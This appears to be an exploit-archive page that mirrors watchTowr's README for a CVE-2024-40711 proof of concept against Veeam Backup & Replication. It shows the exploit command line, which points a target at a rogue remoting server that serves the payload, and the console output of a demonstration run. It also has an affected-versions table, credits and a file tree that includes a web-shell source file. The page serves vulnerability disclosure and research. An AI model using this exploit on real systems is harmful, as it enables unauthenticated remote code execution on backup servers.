Related vulnerability
Description
Pre-Auth Exploit for CVE-2024-40711
Introduction
# CVE-2024-40711
Exploit for the Veeam Backup & Replication pre-auth deserialization vulnerability CVE-2024-40711.
See our [blog post](https://labs.watchtowr.com/veeam-backup-response-rce-with-auth-but-mostly-without-auth-cve-2024-40711-2/) for technical details.
https://github.com/user-attachments/assets/24e8122c-3e84-408b-87a9-684a9aabeb70
# PoC in Action
```
CVE-2024-40711.exe -f binaryformatter -g Veeam -c http://192.168.201.1:8000/trigger --targetveeam 192.168.201.158
   (watchTowr ASCII-art banner)
(*) Veeam Backup & Replication Unauthenticated Remote Code Execution Exploit (CVE-2024-40711)
- Vulnerability Discovered by Florian Hauser (@frycos) at CODE WHITE Gmbh (@codewhitesec)
- Exploit Written by Sina Kheirkhah (@SinSinology) at watchTowr
- Thank you to my dear friend Soroush Dalili (@irsdl) for his help
CVEs: [CVE-2024-40711]
(*) Creating payload for 'cmd /c mspaint.exe'
(*) Wrapping payload in the CDbCryptoKeyInfo custom gadget
(*) Sending Remoting Trigger
(*) Started Rogue Server
HttpServerChannel for 'trigger' created:
http://192.168.201.1:8000/trigger
Press any key to exit ...
[*] Processing message for '/trigger' from 192.168.201.158:50592 ... sending payload!
```
# Florian Hauser
This vulnerability was found by Florian Hauser ([@frycos](https://x.com/frycos)) of CODE WHITE GmbH ([@codewhitesec](https://x.com/codewhitesec)). Make sure to follow his outstanding research; our role was only to recreate and develop the exploit for this issue.
# Affected Versions
| Version | Status |
|--------------------|----------------------------------------------------------------------------------------------|
| 12.2.0.334 | Fully patched. Not affected by the vulnerabilities in this blogpost. |
| 12.1.2.172 | Affected, but exploitation requires authentication. Low privilege users can execute arbitrary code. |
| 12.1.1.56 and earlier | Vulnerable to unauthenticated RCE. |
# Exploit authors
This exploit was written by [Sina Kheirkhah (@SinSinology)](https://x.com/SinSinology) of [watchTowr (@watchtowrcyber)](https://twitter.com/watchtowrcyber).
We'd also like to take the opportunity to thank [Soroush Dalili](https://x.com/irsdl) for his help with this exploit.
# Follow [watchTowr](https://watchTowr.com) Labs
For the latest security research, follow the [watchTowr](https://watchTowr.com) Labs Team:
- https://labs.watchtowr.com/
- https://twitter.com/watchtowrcyber
- https://labs.watchtowr.com/veeam-backup-response-rce-with-auth-but-mostly-without-auth-cve-2024-40711-2/
- https://github.com/codewhitesec/RogueRemotingServer
- https://github.com/tyranid/ExploitRemotingService
- https://www.veeam.com/kb4649
File snapshot
[4.0K] /data/pocs/2d9e79f3ad2d8de4d7cbf7b367675fcd9aca2354
├── [4.0K] CVE-2024-40711-poc
│ ├── [4.0K] ExploitClass
│ │ ├── [1.7K] ExploitClass.cs
│ │ ├── [4.1K] ExploitClass.csproj
│ │ └── [ 13K] GhostWebShell.cs
│ ├── [1.0K] LICENSE.txt
│ ├── [ 87K] logo.png
│ ├── [ 66K] README.md
│ ├── [4.0K] TestConsoleApp
│ │ ├── [ 178] App.config
│ │ ├── [ 347] Program.cs
│ │ ├── [4.0K] Properties
│ │ │ └── [1.4K] AssemblyInfo.cs
│ │ └── [4.5K] TestConsoleApp_YSONET.csproj
│ ├── [4.0K] ysoserial
│ │ ├── [1.6K] App.config
│ │ ├── [4.0K] dlls
│ │ │ ├── [1.3M] Microsoft.PowerShell.Editor.dll
│ │ │ ├── [6.0M] PresentationFramework.dll
│ │ │ ├── [281K] ReachFramework.dll
│ │ │ ├── [290K] ReachFramework-orig.dll
│ │ │ ├── [5.6M] System.Management.Automation.dll
│ │ │ └── [5.7M] System.Management.Automation-orig.dll
│ │ ├── [4.0K] Generators
│ │ │ ├── [3.7K] ActivitySurrogateDisableTypeCheck.cs
│ │ │ ├── [4.0K] ActivitySurrogateSelectorFromFileGenerator.cs
│ │ │ ├── [ 15K] ActivitySurrogateSelectorGenerator.cs
│ │ │ ├── [5.4K] AxHostStateGenerator.cs
│ │ │ ├── [4.1K] BaseActivationFactoryGenerator.cs
│ │ │ ├── [5.7K] ClaimsIdentityGenerator.cs
│ │ │ ├── [5.8K] ClaimsPrincipalGenerator.cs
│ │ │ ├── [4.1K] DataSetGenerator.cs
│ │ │ ├── [ 10K] DataSetOldBehaviourFromFileGenerator.cs
│ │ │ ├── [8.9K] DataSetOldBehaviourGenerator.cs
│ │ │ ├── [4.2K] DataSetTypeSpoofGenerator.cs
│ │ │ ├── [ 10K] GenericGenerator.cs
│ │ │ ├── [8.1K] GenericPrincipalGenerator.cs
│ │ │ ├── [6.2K] GetterCompilerResultsGenerator.cs
│ │ │ ├── [5.4K] GetterSecurityExceptionGenerator.cs
│ │ │ ├── [ 12K] GetterSettingsPropertyValueGenerator.cs
│ │ │ ├── [2.5K] IGenerator.cs
│ │ │ ├── [ 34K] ObjectDataProviderGenerator.cs
│ │ │ ├── [3.3K] ObjRefGenerator.cs
│ │ │ ├── [7.1K] PSObjectGenerator.cs
│ │ │ ├── [ 25K] ResourceSetGenerator.cs
│ │ │ ├── [6.5K] RolePrincipalGenerator.cs
│ │ │ ├── [ 11K] SessionSecurityTokenGenerator.cs
│ │ │ ├── [8.6K] SessionViewStateHistoryItemGenerator.cs
│ │ │ ├── [ 11K] TextFormattingRunPropertiesGenerator.cs
│ │ │ ├── [7.0K] ToolboxItemContainerGenerator.cs
│ │ │ ├── [ 14K] TypeConfuseDelegateGenerator.cs
│ │ │ ├── [2.9K] TypeConfuseDelegateMonoGenerator.cs
│ │ │ ├── [5.4K] VeeamGenerator.cs
│ │ │ ├── [ 15K] WindowsClaimsIdentityGenerator.cs
│ │ │ ├── [9.3K] WindowsIdentityGenerator.cs
│ │ │ ├── [ 12K] WindowsPrincipalGenerator.cs
│ │ │ ├── [5.4K] XamlAssemblyLoadFromFileGenerator.cs
│ │ │ └── [6.5K] XamlImageInfo.cs
│ │ ├── [4.0K] Helpers
│ │ │ ├── [ 40K] BinaryFormatterMinifier.cs
│ │ │ ├── [3.7K] CommandArgSplitter.cs
│ │ │ ├── [ 301] Debugging.cs
│ │ │ ├── [ 372] FormatterType.cs
│ │ │ ├── [4.0K] GadgetSurrogates
│ │ │ │ ├── [ 602] GetterSettingsPropertyValueSurrogates.cs
│ │ │ │ └── [ 816] ObjectDataProviderSurrogates.cs
│ │ │ ├── [7.4K] InputArgs.cs
│ │ │ ├── [3.0K] JsonHelper.cs
│ │ │ ├── [2.2K] LocalCodeCompiler.cs
│ │ │ ├── [5.2K] MessagePackGetterSettingsPropertyValueHelper.cs
│ │ │ ├── [5.3K] MessagePackObjectDataProviderHelper.cs
│ │ │ ├── [4.0K] ModifiedVulnerableBinaryFormatters
│ │ │ │ ├── [ 13K] AdvancedBinaryFormatterParser.cs
│ │ │ │ ├── [ 93K] binarycommonclasses.cs
│ │ │ │ ├── [ 24K] binaryconverter.cs
│ │ │ │ ├── [5.6K] binaryenums.cs
│ │ │ │ ├── [ 12K] binaryformatter.cs
│ │ │ │ ├── [ 30K] binaryformatterwriter.cs
│ │ │ │ ├── [4.2K] binarymethodmessage.cs
│ │ │ │ ├── [ 40K] binaryobjectinfo.cs
│ │ │ │ ├── [ 69K] binaryobjectreader.cs
│ │ │ │ ├── [ 59K] binaryobjectwriter.cs
│ │ │ │ ├── [ 73K] binaryparser.cs
│ │ │ │ ├── [ 31K] binaryutilclasses.cs
│ │ │ │ ├── [ 759] Environment.cs
│ │ │ │ ├── [ 499] info.txt
│ │ │ │ ├── [5.1K] ObjectExtensions.cs
│ │ │ │ ├── [1.6K] SerTrace.cs
│ │ │ │ ├── [7.1K] SimpleBinaryFormatterParser.cs
│ │ │ │ └── [1.5K] SimpleObjectLosFormatter.cs
│ │ │ ├── [ 38K] SerializersHelper.cs
│ │ │ ├── [ 23K] XmlHelper.cs
│ │ │ └── [ 573] YamlDocumentHelper.cs
│ │ ├── [1.8K] packages.config
│ │ ├── [4.0K] Plugins
│ │ │ ├── [2.5K] ActivatorUrlPlugin.cs
│ │ │ ├── [7.4K] AltserializationPlugin.cs
│ │ │ ├── [4.4K] ApplicationTrustPlugin.cs
│ │ │ ├── [5.5K] ClipboardPlugin.cs
│ │ │ ├── [6.2K] DotNetNukePlugin.cs
│ │ │ ├── [ 11K] GetterCallGadgetsPlugin.cs
│ │ │ ├── [ 254] IPlugin.cs
│ │ │ ├── [ 10K] NetNonRceGadgetsPlugin.cs
│ │ │ ├── [ 14K] ResxPlugin.cs
│ │ │ ├── [5.0K] SessionSecurityTokenHandlerPlugin.cs
│ │ │ ├── [ 19K] SharePointPlugin.cs
│ │ │ ├── [ 21K] ThirdPartyGadgetsPlugin.cs
│ │ │ ├── [4.6K] TransactionManagerReenlist.cs
│ │ │ └── [ 26K] ViewStatePlugin.cs
│ │ ├── [ 36K] Program.cs
│ │ ├── [4.0K] Properties
│ │ │ └── [1.4K] AssemblyInfo.cs
│ │ └── [ 19K] ysoserial.csproj
│ └── [3.9K] ysoserial.sln
├── [1.8M] demo.mp4
├── [4.0K] ExploitRemotingService-master
│ ├── [4.0K] ExampleRemotingService
│ │ ├── [ 158] app.config
│ │ ├── [4.3K] ExampleRemotingService.csproj
│ │ ├── [ 137] packages.config
│ │ ├── [5.6K] Program.cs
│ │ └── [4.0K] Properties
│ │ └── [1.4K] AssemblyInfo.cs
│ ├── [4.0K] ExploitRemotingService
│ │ ├── [ 246] App.config
│ │ ├── [ 952] ChannelUriFixingClientChannelSinkProvider.cs
│ │ ├── [1.4K] ChannelUriFixingServerChannelSinkProvider.cs
│ │ ├── [8.1K] CustomChannel.cs
│ │ ├── [2.1K] DataSetMarshal.cs
│ │ ├── [6.8K] ExploitRemotingService.csproj
│ │ ├── [2.9K] FakeComObjRef.cs
│ │ ├── [5.0K] FakeMessage.cs
│ │ ├── [4.4K] FakeMethod.cs
│ │ ├── [1.6K] FakeType.cs
│ │ ├── [1.8K] MethodCallWrapper.cs
│ │ ├── [ 202] packages.config
│ │ ├── [ 26K] Program.cs
│ │ ├── [4.0K] Properties
│ │ │ └── [1.4K] AssemblyInfo.cs
│ │ ├── [1.2K] SerializableWrapper.cs
│ │ ├── [8.5K] SerializerRemoteClass.cs
│ │ └── [3.1K] TcpMessageWriter.cs
│ ├── [3.1K] ExploitRemotingService.sln
│ ├── [4.0K] Installer
│ │ ├── [4.0K] FakeAsm.csproj
│ │ ├── [2.3K] InstallClass.cs
│ │ ├── [1.2K] IRemoteClass.cs
│ │ ├── [4.0K] Properties
│ │ │ └── [1.1K] AssemblyInfo.cs
│ │ ├── [3.1K] RemoteClass.cs
│ │ └── [1.2K] SerializableRegister.cs
│ ├── [ 34K] LICENSE
│ └── [4.4K] README.md
└── [3.1K] README.md
19 directories, 135 files
Notes
1. It is recommended to access the original source first.
2. If the source is no longer available or cannot be accessed, email f.jinxu#gmail.com to request the local snapshot (replace # with @).
3. 神龙 has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.